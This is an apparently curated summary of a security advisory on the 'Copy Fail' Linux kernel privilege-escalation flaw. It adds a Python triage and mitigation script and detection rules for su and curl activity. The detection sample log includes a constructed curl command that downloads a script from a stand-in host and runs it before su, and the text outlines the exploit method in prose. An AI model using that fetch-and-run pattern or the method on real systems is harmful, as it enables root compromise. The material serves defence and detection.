Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
Summary
A critical local privilege escalation (LPE) vulnerability, CVE-2026-31431, dubbed "Copy Fail," was publicly disclosed on April 29, 2026. Found through an AI-assisted process, it is a deterministic logic flaw that lets an unprivileged local attacker reliably obtain root on virtually every major Linux distribution released since 2017, including Ubuntu, Red Hat Enterprise Linux, and Debian. The bug lives in the kernel's cryptographic subsystem, in the algif_aead module behind the AF_ALG socket interface, and stems from an in-place processing optimization introduced in 2017. During an AEAD operation, four attacker-controlled bytes are written past the end of the intended buffer into a page of the kernel's file page cache. Exploitable with a 732-byte Python script, Copy Fail lets an attacker patch the in-memory copy of a setuid-root binary such as su or sudo; the file on disk is untouched, so on-disk integrity checks do not notice the change. The same primitive enables container breakouts, takeover of multi-tenant hosts, and compromise of CI/CD pipelines. Affected kernels range from 4.14 to 6.19.12.
Key takeaway
For MLOps engineers and security engineers managing Linux environments, patch systems for CVE-2026-31431, "Copy Fail," as a priority; a kernel fix takes effect only after a reboot or live patch, so schedule that too. This LPE flaw lets an unprivileged local attacker gain root deterministically, and the patched binary lives only in the page cache, so file integrity checks against disk do not catch it. If immediate patching is not feasible, disable the algif_aead kernel module as an interim mitigation; be aware that this breaks any userspace that relies on the AF_ALG AEAD interface, and that it only works where algif_aead is a loadable module rather than built into the kernel. Deploy detection queries for suspicious su and curl activity now, because public proof-of-concept exploits are already circulating.
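The interim mitigation above has two practical snags: a plain modprobe blacklist does not stop the kernel from autoloading algif_aead when a process binds an AF_ALG socket, and a kernel with the AEAD interface built in cannot be mitigated this way at all. The triage script below is an added example (not Unit 42's code and not from the original article): it takes the affected version range and the module name from the article, uses the standard Linux paths for /proc/modules and modules.builtin, and everything else (the config file name, the decision logic, the "install ... /bin/false" technique) is this example's own choice.

```python
"""Triage helper for CVE-2026-31431 ("Copy Fail") on a Linux host.

Added example, not Unit 42's code. The affected kernel range and the
algif_aead module name come from the article; file paths are the standard
Linux ones; the decision logic and config file name are this example's own.
"""
import re
import subprocess
from typing import List, Optional, Tuple

MODULE = "algif_aead"
AFFECTED_MIN = (4, 14, 0)   # article: affected from 4.14 ...
AFFECTED_MAX = (6, 19, 12)  # ... up to and including 6.19.12
CONF_PATH = f"/etc/modprobe.d/{MODULE}-cve-2026-31431.conf"  # name chosen for this example

# "install <module> /bin/false" makes every load attempt fail, including the
# kernel's own autoload when a process binds an AF_ALG socket of type "aead".
# A bare "blacklist algif_aead" line only affects alias resolution and does
# NOT stop that on-demand autoload, which is why it is not used here.
MODPROBE_CONF = (
    f"# Interim mitigation for CVE-2026-31431: prevent {MODULE} from loading\n"
    f"install {MODULE} /bin/false\n"
)


def parse_kernel_version(release: str) -> Optional[Tuple[int, int, int]]:
    """'5.15.0-91-generic' -> (5, 15, 0); '6.19.12' -> (6, 19, 12); junk -> None."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def version_in_affected_range(release: str) -> bool:
    """Heuristic only. Distro kernels backport fixes without bumping the upstream
    version, so True means 'consult the vendor advisory', not 'vulnerable'."""
    v = parse_kernel_version(release)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX


def module_state(proc_modules: str, modules_builtin: str) -> str:
    """Classify the module from the text of /proc/modules and modules.builtin.

    'builtin' : compiled into the kernel; modprobe.d cannot disable it,
                only a fixed kernel helps.
    'loaded'  : resident loadable module; unload it, then block reloading.
    'absent'  : not loaded; block it so it cannot be autoloaded on demand.
    """
    if any(line.strip().endswith(f"/{MODULE}.ko") for line in modules_builtin.splitlines()):
        return "builtin"
    if any(line.split(" ", 1)[0] == MODULE for line in proc_modules.splitlines()):
        return "loaded"
    return "absent"


def recommended_actions(release: str, proc_modules: str, modules_builtin: str) -> List[str]:
    """Pure function (no host access) so the decision logic can be tested offline."""
    if not version_in_affected_range(release):
        return [f"{release.strip()}: outside the published 4.14..6.19.12 range; "
                "confirm with the vendor advisory"]
    state = module_state(proc_modules, modules_builtin)
    if state == "builtin":
        return [f"{MODULE} is built in: modprobe.d cannot disable it; update the kernel and reboot"]
    steps = []
    if state == "loaded":
        # rmmod fails with "Module ... is in use" while an AF_ALG aead socket is
        # open; find and stop the holder first (lsof/fuser on the socket inode).
        steps.append(f"rmmod {MODULE}")
    steps.append(f"write {CONF_PATH}")
    steps.append("schedule the kernel update; the interim block breaks AF_ALG AEAD users")
    return steps


def main(apply: bool = False) -> None:
    """Run the triage on this host; with apply=True (as root) also write the config."""
    release = subprocess.run(["uname", "-r"], capture_output=True, text=True, check=True).stdout
    with open("/proc/modules") as f:
        proc_modules = f.read()
    try:
        with open(f"/lib/modules/{release.strip()}/modules.builtin") as f:
            builtin = f.read()
    except FileNotFoundError:
        builtin = ""  # no modules.builtin: treat as unknown, fall through to 'absent'
    actions = recommended_actions(release, proc_modules, builtin)
    for step in actions:
        print(step)
    if apply and f"write {CONF_PATH}" in actions:
        with open(CONF_PATH, "w") as f:
            f.write(MODPROBE_CONF)
        print(f"wrote {CONF_PATH}")


if __name__ == "__main__":
    import sys
    main(apply="--apply" in sys.argv)
```

Run it as an unprivileged user to see the recommendation, then `sudo python3 triage.py --apply` to drop the modprobe.d file; re-run afterwards and confirm `module_state` reports "absent" even after a process tries to use AF_ALG AEAD. Treat the version check as a prompt to read the vendor advisory, not as proof either way.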
Key insights
A deterministic Linux kernel logic flaw enables reliable local privilege escalation via page cache corruption.
Principles
- In-place optimizations can introduce critical flaws.
- Modifying a file's pages in the kernel page cache leaves the on-disk file unchanged, so integrity checks that hash or verify the file on disk do not see the change.
- Deterministic exploits succeed every time they run, which makes them far more dangerous than probabilistic ones.
Method
An unprivileged local attacker combines the AF_ALG socket interface with the splice() system call so that the vulnerable AEAD code path writes four controlled bytes into a page-cache page backing a setuid-root binary such as su or sudo, turning that binary into one that hands out root.
In practice
- Disable the algif_aead module as an interim mitigation, blocking on-demand autoload as well as unloading it if it is currently loaded.
- Use XQL queries to detect su launches from unusual parent processes.
- Correlate curl downloads with subsequent su executions by the same user on the same host.
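The two detection ideas above, worked out in code as an added example rather than Unit 42's XQL: a parser for a constructed process-start log, an "su from an unexpected parent" rule, a "curl followed by su" correlation, and a merge of both into per-su findings. The log format, the field names, the parent allow-list and the 300-second window are this example's own assumptions; adapt them to whatever your EDR, auditd or eBPF exec telemetry actually emits.

```python
"""Detection logic for the Copy Fail post-exploitation pattern: su launched from
an unexpected parent, and curl shortly followed by su from the same actor.
Added example, not Unit 42's queries; log format and thresholds are assumptions.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

Event = Dict[str, object]

# Parents from which an interactive su is normal. Anything else, such as
# python3 (the article's PoC is a Python script), a CI runner or a web server
# worker, is worth a look. Tune per fleet.
NORMAL_SU_PARENTS: Set[str] = {"bash", "sh", "dash", "zsh", "fish", "login", "sshd"}

# Constructed sample telemetry (not real data). One process-start event per line:
# epoch seconds | host | user | process | parent process | command line
SAMPLE_LOG = """\
1000|build-07|ci|bash|sshd|-bash
1010|build-07|ci|curl|bash|curl -sSfLo /tmp/x.py http://example.invalid/x.py
1025|build-07|ci|python3|bash|python3 /tmp/x.py
1030|build-07|ci|su|python3|su -c id root
1200|web-02|alice|su|bash|su -
5000|web-02|bob|curl|bash|curl -s https://example.invalid/health
5700|web-02|bob|su|bash|su -
5010|web-02|carol|su|bash|su -
"""


def parse_log(text: str) -> List[Event]:
    """Parse the pipe-separated sample format; the command line may itself contain '|'."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, name, parent, cmd = line.split("|", 5)
        events.append({"ts": int(ts), "host": host, "user": user,
                       "name": name, "parent": parent, "cmd": cmd})
    return events


def su_from_unusual_parent(events: List[Event], allowed: Set[str] = NORMAL_SU_PARENTS) -> List[Event]:
    """Rule 1: su whose parent is not an allow-listed shell or login process."""
    return [e for e in events if e["name"] == "su" and e["parent"] not in allowed]


def curl_then_su(events: List[Event], window_s: int = 300) -> List[Tuple[Event, Event]]:
    """Rule 2: for each su, the most recent curl by the same host+user within window_s.
    Returns (curl_event, su_event) pairs ordered by the su timestamp."""
    by_actor: Dict[Tuple[object, object], List[Event]] = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_actor[(e["host"], e["user"])].append(e)
    pairs: List[Tuple[Event, Event]] = []
    for seq in by_actor.values():
        last_curl = None
        for e in seq:
            if e["name"] == "curl":
                last_curl = e
            elif e["name"] == "su" and last_curl is not None \
                    and e["ts"] - last_curl["ts"] <= window_s:
                pairs.append((last_curl, e))
    return sorted(pairs, key=lambda p: p[1]["ts"])


def findings(events: List[Event], window_s: int = 300,
             allowed: Set[str] = NORMAL_SU_PARENTS) -> List[Event]:
    """Merge both rules per su event; 'high' when both fire, 'medium' for one."""
    unusual = {(e["host"], e["user"], e["ts"]) for e in su_from_unusual_parent(events, allowed)}
    correlated = {(s["host"], s["user"], s["ts"]): c for c, s in curl_then_su(events, window_s)}
    out: List[Event] = []
    for e in events:
        if e["name"] != "su":
            continue
        key = (e["host"], e["user"], e["ts"])
        reasons = []
        if key in unusual:
            reasons.append(f"su spawned by {e['parent']!r}, not an allow-listed shell/login process")
        if key in correlated:
            c = correlated[key]
            reasons.append(f"curl ran {e['ts'] - c['ts']}s earlier: {c['cmd']}")
        if reasons:
            out.append({"host": e["host"], "user": e["user"], "ts": e["ts"],
                        "severity": "high" if len(reasons) == 2 else "medium",
                        "reasons": reasons})
    return out


if __name__ == "__main__":
    for f in findings(parse_log(SAMPLE_LOG)):
        print(f["severity"], f["host"], f["user"], f["ts"], *f["reasons"], sep=" | ")
```

On the sample data only the build host fires, and it fires on both rules: su was spawned by python3 twenty seconds after a curl download. The web host's su from a shell with a stale curl seven hundred seconds earlier stays quiet at the default window, which is the point of the correlation: a curl-then-su pair is only interesting when it is tight and from the same actor.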
Topics
- Linux Kernel Security
- Local Privilege Escalation
- CVE-2026-31431
- Copy Fail Vulnerability
- Page Cache Exploitation
- AF_ALG Cryptography
Best for: CTO, VP of Engineering/Data, Director of AI/ML, Security Engineer, MLOps Engineer, DevOps Engineer
Editorial summary, takeaway, and curation by AIssential. Original article published by Unit 42.